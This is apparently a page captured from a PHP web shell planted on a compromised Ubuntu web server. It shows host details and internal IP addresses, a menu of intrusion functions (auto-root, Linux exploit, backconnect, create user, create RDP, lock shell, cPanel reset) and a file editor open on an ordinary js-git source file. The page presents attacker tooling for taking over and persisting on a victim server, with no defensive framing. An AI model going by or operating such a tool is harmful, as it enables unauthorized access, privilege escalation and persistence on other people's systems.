Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
js-git /
mixins /
[ HOME SHELL ]
Name
Size
Permission
Action
add-cache.js
1.59
KB
-rw-rw-r--
create-tree.js
3.84
KB
-rw-rw-r--
delay.js
1.43
KB
-rw-rw-r--
fall-through.js
811
B
-rw-rw-r--
formats.js
3.55
KB
-rw-rw-r--
fs-db.js
10.3
KB
-rw-rw-r--
indexed-db.js
3.84
KB
-rw-rw-r--
mem-cache.js
1.54
KB
-rw-rw-r--
mem-db.js
2.24
KB
-rw-rw-r--
pack-ops.js
5.8
KB
-rw-rw-r--
path-to-entry.js
1.23
KB
-rw-rw-r--
read-combiner.js
761
B
-rw-rw-r--
sync.js
4.11
KB
-rw-rw-r--
walkers.js
3.82
KB
-rw-rw-r--
websql-db.js
4.38
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : formats.js
"use strict"; var bodec = require('bodec'); var treeMap = require('../lib/object-codec').treeMap; module.exports = function (repo) { var loadAs = repo.loadAs; repo.loadAs = newLoadAs; var saveAs = repo.saveAs; repo.saveAs = newSaveAs; function newLoadAs(type, hash, callback) { if (!callback) return newLoadAs.bind(repo, type, hash); var realType = type === "text" ? "blob": type === "array" ? "tree" : type; return loadAs.call(repo, realType, hash, onLoad); function onLoad(err, body, hash) { if (body === undefined) return callback(err); if (type === "text") body = bodec.toUnicode(body); if (type === "array") body = toArray(body); return callback(err, body, hash); } } function newSaveAs(type, body, callback) { if (!callback) return newSaveAs.bind(repo, type, body); type = type === "text" ? "blob": type === "array" ? "tree" : type; if (type === "blob") { if (typeof body === "string") { body = bodec.fromUnicode(body); } } else if (type === "tree") { body = normalizeTree(body); } else if (type === "commit") { body = normalizeCommit(body); } else if (type === "tag") { body = normalizeTag(body); } return saveAs.call(repo, type, body, callback); } }; function toArray(tree) { return Object.keys(tree).map(treeMap, tree); } function normalizeTree(body) { var type = body && typeof body; if (type !== "object") { throw new TypeError("Tree body must be array or object"); } var tree = {}, i, l, entry; // If array form is passed in, convert to object form. if (Array.isArray(body)) { for (i = 0, l = body.length; i < l; i++) { entry = body[i]; tree[entry.name] = { mode: entry.mode, hash: entry.hash }; } } else { var names = Object.keys(body); for (i = 0, l = names.length; i < l; i++) { var name = names[i]; entry = body[name]; tree[name] = { mode: entry.mode, hash: entry.hash }; } } return tree; } function normalizeCommit(body) { if (!body || typeof body !== "object") { throw new TypeError("Commit body must be an object"); } if (!(body.tree && body.author && body.message)) { throw new TypeError("Tree, author, and message are required for commits"); } var parents = body.parents || (body.parent ? [ body.parent ] : []); if (!Array.isArray(parents)) { throw new TypeError("Parents must be an array"); } var author = normalizePerson(body.author); var committer = body.committer ? normalizePerson(body.committer) : author; return { tree: body.tree, parents: parents, author: author, committer: committer, message: body.message }; } function normalizeTag(body) { if (!body || typeof body !== "object") { throw new TypeError("Tag body must be an object"); } if (!(body.object && body.type && body.tag && body.tagger && body.message)) { throw new TypeError("Object, type, tag, tagger, and message required"); } return { object: body.object, type: body.type, tag: body.tag, tagger: normalizePerson(body.tagger), message: body.message }; } function normalizePerson(person) { if (!person || typeof person !== "object") { throw new TypeError("Person must be an object"); } if (typeof person.name !== "string" || typeof person.email !== "string") { throw new TypeError("Name and email are required for person fields"); } return { name: person.name, email: person.email, date: person.date || new Date() }; }
Close